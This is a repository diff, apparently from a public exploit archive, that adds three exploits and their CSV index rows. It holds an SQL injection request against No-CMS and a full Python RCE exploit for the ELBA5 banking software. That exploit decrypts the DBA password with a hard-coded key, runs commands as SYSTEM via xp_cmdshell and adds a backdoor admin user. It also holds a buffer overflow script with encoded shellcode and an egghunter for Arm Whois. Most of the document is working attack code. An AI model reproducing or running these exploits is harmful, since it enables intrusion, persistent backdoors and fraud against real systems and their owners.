# 5. Timeline
# 24/07/2018 Discovery
# 24/07/2018 Contact with developer
# 24/07/2018 Solution to vulnerability as pending
# 02/11/2018 Request ID CVE
# 04/11/2018 Assigned CVE-2018-18923
# 05/11/2018 Public disclosure
# 6. References:
# https://hackpuntes.com/cve-2018-18923-ticketly-1-0-multiples-sql-injections/

42
exploits/php/webapps/45903.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: No-Cms 1.0 - 'order_by' SQL Injection
# Date: 2018-11-28
# Exploit Author: Loading Kura Kura
# Vendor Homepage: https://github.com/goFrendiAsgard/No-CMS
# Software Link: https://codeload.github.com/goFrendiAsgard/No-CMS/zip/master
# Tested on: Win10/Kali Linux
# Google Dork: n/a
# Version: n/a
# CVE :
# No-CMS is a CMS-framework.
# No-CMS is a basic and "less-assumption" CMS with some default features such as
# user authorization (including third party authentication), menu, module and theme management.
# It is fully customizable and extensible, you can make your own module and your own themes.
# It provide freedom to make your very own CMS, which is not provided very well by any other CMS.
# POC
#Sqli injection { order_by[0] }
POST /nocms/main/manage_privilege/index/export HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/nocms/main/manage_privilege
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Connection: close
Cookie: bb9865483ae270ceba27539501d10599=rf0at4ehbd1ttckd85skvf17ssq4dfh2; crud_page_a36781f1e31bde68770f40381aad7df6=1; per_page_a36781f1e31bde68770f40381aad7df6=25; hidden_ordering_a36781f1e31bde68770f40381aad7df6=asc; hidden_sorting_a36781f1e31bde68770f40381aad7df6=index; search_text_a36781f1e31bde68770f40381aad7df6=; search_field_a36781f1e31bde68770f40381aad7df6=; 3c158ec1144ba8bb0dd8a7ca03988b5c=e4p2j92lle03vpp6ccuv2c8dro86ebep; crud_page_710a7d8c82ae37e845c3da5df1073379=1; per_page_710a7d8c82ae37e845c3da5df1073379=25; hidden_ordering_710a7d8c82ae37e845c3da5df1073379=desc; hidden_sorting_710a7d8c82ae37e845c3da5df1073379=date; search_text_710a7d8c82ae37e845c3da5df1073379=dd; search_field_710a7d8c82ae37e845c3da5df1073379=sec0e67fc; __secret_code=d282ef263719ab842e05
Upgrade-Insecure-Requests: 1
search_text=&search_field=/**/&per_page=25&order_by[0]=[INJECT HERE]&order_by[1]=&page=1
=========================
Regards
Loading Kura Kura
thanks To :
Siluman IWAK
Siluman Cupatkai
Siluman TUMO
dan kamu sayang :*

216
exploits/windows/remote/45905.py Executable file
View file

@ -0,0 +1,216 @@
# Exploit Title: ELBA5 5.8.0 - Remote Code Execution
# Date: 2018-11-16
# Exploit Author: Florian Bogner
# Vendor Homepage: https://www.elba.at
# Vulnerable Software: https://www.elba.at/eBusiness/01_template1/1206507788612244132-1206515595789049657_1206515641959948315-1292519691128454196-NA-38-NA.html
# Version: up to 5.8.0
# Tested on: any Windows OS
# Full Writeup: https://bogner.sh/2018/11/0-day-in-elba5s-network-installation-overtaking-your-companys-bank-account/
# Summary: This exploit has been tested against ELBA5 version 5.7.1 to 5.8.0. It can be used to remotely obtain code
# execution on the ELBA5 server with full SYSTEM level permissions. Additionally, a backdoor user can be added
Please see attachment for the full python exploit.
import sys
import hashlib
try:
import sqlanydb
except:
print("\n")
print("==================================================")
print("This exploit depends on the sqlanydb python module")
print("Run \"pip install sqlanydb\" to install it")
print("==================================================")
print("\n")
raise
# this should be defined on the cli
DB_HOST=None
ACTION=None
# The default ELBA port
DB_PORT="2640"
# The servername to connect to... does not really matter anywhay
DB_SERVERNAME="ELBA5SRV"
# The initial "connector" database user that is used to obtain the actual DBA credentials
DB_CONNECTOR_UID="connector"
DB_CONNECTOR_PWD="connector"
# The actual DB user with DBA permissions
DB_DBA_UID="elba"
DB_DBA_PWD=None
DB_DBA_ENCRYPTION_PWD="Af&Pw_dw7$Yd9#"
def main():
print("==================================================")
print(" ELBA5 Electronic Banking (https://www.elba.at/)")
print(" Network Installation RCE Exploit")
print("")
print("This exploit has been tested against version 5.7.1")
print("to 5.8.0. It can be used to remotely obtain code")
print("execution on the ELBA5 server with full SYSTEM")
print("level permissions.")
print("")
print("Discovered by: Florian Bogner @ Bee IT Security")
print(" florian(at)bee-itsecurity.at")
print("==================================================")
print("")
if (len(sys.argv)<3):
print_usage()
sys.exit(1)
# get info from cli
global DB_HOST
global ACTION
DB_HOST=sys.argv[1]
ACTION=sys.argv[2]
#### phase 1
print("[*] Starting phase 1: Obtain & Decrypt DBA password")
DB_DBA_PWD=fetch_db_dba_pwd()
if (DB_DBA_PWD==None):
print("[-] Something went wrong in phase 1... Exiting")
sys.exit(1)
print("[+] Received the DBA password: "+DB_DBA_PWD)
#### phase 2
print("[*] Starting phase 2: Establishing a DB connection as DBA")
conn = sqlanydb.connect(
uid=DB_DBA_UID,
pwd=DB_DBA_PWD,
servername='ELBA5SRV',
host=''+DB_HOST+':'+DB_PORT
)
if (conn==None):
print("[-] Something went wrong in phase 2... Exiting")
sys.exit(1)
print("[+] Connection established as DBA")
#### deliver payload
if (ACTION=="addUser"):
print("[*] Starting phase 3: Adding a backdoor user")
add_elba_user(conn);
elif (ACTION=="runCommand"):
print("[*] Starting phase 3: Running command")
run_command(conn);
else:
print("[*] Unknown action "+ACTION+"... Exiting cleanly")
#### winding down
print("[*] Closing DBA connection")
conn.close()
def print_usage():
print("Usage: "+sys.argv[0]+" <target> <action> <sub arguments...>");
print("");
print("target: The system to attack");
print("actions:");
print(" * addUser: adds an ELBA Backdoor user to the given install")
print(" * runCommand: A command to run on the target as SYSTEM")
print(" Provide the command to run as a sub argument")
print(" (No output is provided)")
def run_command(conn):
if (len(sys.argv)!=4):
print("[-] No command given... Exiting cleanly")
return
CMD=sys.argv[3]
curs = conn.cursor()
print("[*] Will try to execute: "+CMD)
curs.execute("CALL xp_cmdshell('"+CMD+"');")
curs.close()
def add_elba_user(conn):
USER_TO_ADD = "HACKER"
USER_PASSWORD = "H4cker"
# check if a user with the given name already exists
print("[*] Checking if the username "+USER_TO_ADD+" is unused")
curs = conn.cursor()
curs.execute("SELECT * FROM \"elbndba\".\"BEDIENER\" WHERE BEDIENER='"+USER_TO_ADD+"'")
rowset = curs.fetchall()
curs.close()
if (len(rowset)>0):
print("[-] A user with the name "+USER_TO_ADD+" already exists! Exiting cleanly...")
return
# get the largest current bedienerKey
print("[*] Request the largest current bedienerKey")
curs = conn.cursor()
curs.execute("SELECT MAX(bedienerKey) FROM \"elbndba\".\"BEDIENER\"")
currentBedienerKey = curs.fetchone()[0]
curs.close()
newBedienerKey=currentBedienerKey+1
print("[*] Will use the new bedienerKey "+str(newBedienerKey))
# create password hash
print("[*] Hash the password")
usrdir="USER"+str(newBedienerKey)
string_to_hash=USER_PASSWORD+str(newBedienerKey)+usrdir
hash = hashlib.sha256(string_to_hash.encode('ascii','replace')).hexdigest()
print("[*] Will use the hash: "+hash)
# add the user
print("[*] Finally adding the user")
curs = conn.cursor()
sql = "INSERT INTO \"elbndba\".\"BEDIENER\" (BEDIENER,NAME,ABTEILUNG,PASSWORT,GESPERRT,ADMIN,USRDIR,geloescht,bedienerKey) "
sql += "VALUES ('"+USER_TO_ADD+"','"+USER_TO_ADD+"','','"+hash+"',0,1,'"+usrdir+"',0,"+str(newBedienerKey)+");"
curs.execute(sql)
# commit changes
print("[*] Commiting changes")
conn.commit()
print("[+] Login as "+USER_TO_ADD+" with the password "+USER_PASSWORD)
curs.close()
# connect to the target host with the "connector" user and extract the dba password
def fetch_db_dba_pwd():
target_host=''+DB_HOST+':'+DB_PORT
print("[*] Trying to connect to the target server: "+target_host)
conn = sqlanydb.connect(
uid=DB_CONNECTOR_UID,
pwd=DB_CONNECTOR_PWD,
servername='ELBA5SRV',
host=target_host
)
print("[*] Extracting the secret key")
curs = conn.cursor()
curs.execute("SELECT DECRYPT(daten, '"+DB_DBA_ENCRYPTION_PWD+"', 'AES') FROM elbndba.connection")
# decode the result to a valid utf-8 string
decrypted_pwd=curs.fetchone()[0].decode("utf-8") ;
curs.close()
conn.close()
return decrypted_pwd;
main();

42
exploits/windows_x86/local/45907.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR)
# Google Dork: [if applicable]
# Date: 23/11/2018
# Exploit Author: zephyr
# Vendor Homepage: http://www.armcode.com
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows Vista Ultimate SP1 x86 unpatched
# CVE :
# nSEH @ 672 on Windows Vista Ultimate SP1 unpatched
# msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -a x86 --platform windows
nops = "\x90"*20
buf = "w00tw00t" + nops + ("\xba\x0e\xc3\xc8\xe6\xdd\xc4\xd9\x74\x24\xf4\x5e\x29"
"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x01\x21"
"\x3d\x1a\xf5\x27\xbe\xe3\x05\x48\x36\x06\x34\x48\x2c"
"\x42\x66\x78\x26\x06\x8a\xf3\x6a\xb3\x19\x71\xa3\xb4"
"\xaa\x3c\x95\xfb\x2b\x6c\xe5\x9a\xaf\x6f\x3a\x7d\x8e"
"\xbf\x4f\x7c\xd7\xa2\xa2\x2c\x80\xa9\x11\xc1\xa5\xe4"
"\xa9\x6a\xf5\xe9\xa9\x8f\x4d\x0b\x9b\x01\xc6\x52\x3b"
"\xa3\x0b\xef\x72\xbb\x48\xca\xcd\x30\xba\xa0\xcf\x90"
"\xf3\x49\x63\xdd\x3c\xb8\x7d\x19\xfa\x23\x08\x53\xf9"
"\xde\x0b\xa0\x80\x04\x99\x33\x22\xce\x39\x98\xd3\x03"
"\xdf\x6b\xdf\xe8\xab\x34\xc3\xef\x78\x4f\xff\x64\x7f"
"\x80\x76\x3e\xa4\x04\xd3\xe4\xc5\x1d\xb9\x4b\xf9\x7e"
"\x62\x33\x5f\xf4\x8e\x20\xd2\x57\xc4\xb7\x60\xe2\xaa"
"\xb8\x7a\xed\x9a\xd0\x4b\x66\x75\xa6\x53\xad\x32\x02"
"\x6e\xac\x19\x3b\xd7\xa4\x1c\x26\xe8\x12\x62\x5f\x6b"
"\x97\x1a\xa4\x73\xd2\x1f\xe0\x33\x0e\x6d\x79\xd6\x30"
"\xc2\x7a\xf3\x52\x85\xe8\x9f\xba\x20\x89\x3a\xc3")
egghunter = nops + ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + "\x90"*15
junk = "A"*(672-len(buf+egghunter))
nseh = "\xeb\xc7\x90\x90"
seh = "\x57\x22\x41"
payload = junk + buf + egghunter + nseh + seh
f = open("tmp.txt", 'wb')
f.write(payload)
f.close()
print len(payload)

10
files_exploits.csv
View file

@ -6195,6 +6195,7 @@ id,file,description,date,author,type,platform,port
45887,exploits/windows/dos/45887.py,"XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)",2018-11-19,s7acktrac3,dos,windows,
45889,exploits/windows/dos/45889.js,"Microsoft Edge Chakra - OP_Memset Type Confusion",2018-11-19,"Google Security Research",dos,windows,
45891,exploits/macos/dos/45891.c,"Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)",2018-11-20,"Fabiano Anemone",dos,macos,
45901,exploits/linux/dos/45901.txt,"MariaDB Client 10.1.26 - Denial of Service (PoC)",2018-11-26,strider,dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10116,6 +10117,8 @@ id,file,description,date,author,type,platform,port
45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16965,6 +16968,8 @@ id,file,description,date,author,type,platform,port
45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,
45791,exploits/bsd/remote/45791.rb,"Morris Worm - fingerd Stack Buffer Overflow (Metasploit)",2018-11-06,Metasploit,remote,bsd,79
45851,exploits/java/remote/45851.rb,"Atlassian Jira - Authenticated Upload Code Execution (Metasploit)",2018-11-14,Metasploit,remote,java,2990
45905,exploits/windows/remote/45905.py,"ELBA5 5.8.0 - Remote Code Execution",2018-11-26,"Florian Bogner",remote,windows,2640
45909,exploits/hardware/remote/45909.rb,"Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)",2018-11-27,Metasploit,remote,hardware,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40400,3 +40405,8 @@ id,file,description,date,author,type,platform,port
45895,exploits/php/webapps/45895.txt,"Ticketly 1.0 - 'name' SQL Injection",2018-11-21,"Javier Olmedo",webapps,php,80
45896,exploits/php/webapps/45896.txt,"WordPress CherryFramework Themes 3.1.4 - Backup File Download",2018-11-21,b1p0l4r,webapps,php,80
45897,exploits/php/webapps/45897.txt,"WebOfisi E-Ticaret V4 - 'urun' SQL Injection",2018-11-21,AkkuS,webapps,php,80
45899,exploits/hardware/webapps/45899.txt,"Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials",2018-11-26,Hodorsec,webapps,hardware,
45900,exploits/php/webapps/45900.txt,"WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting",2018-11-26,En_dust,webapps,php,80
45902,exploits/php/webapps/45902.txt,"Ticketly 1.0 - 'kind_id' SQL Injection",2018-11-26,"Javier Olmedo",webapps,php,80
45903,exploits/php/webapps/45903.txt,"No-Cms 1.0 - 'order_by' SQL Injection",2018-11-26,"Loading Kura Kura",webapps,php,80
45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80

Can't render this file because it is too large.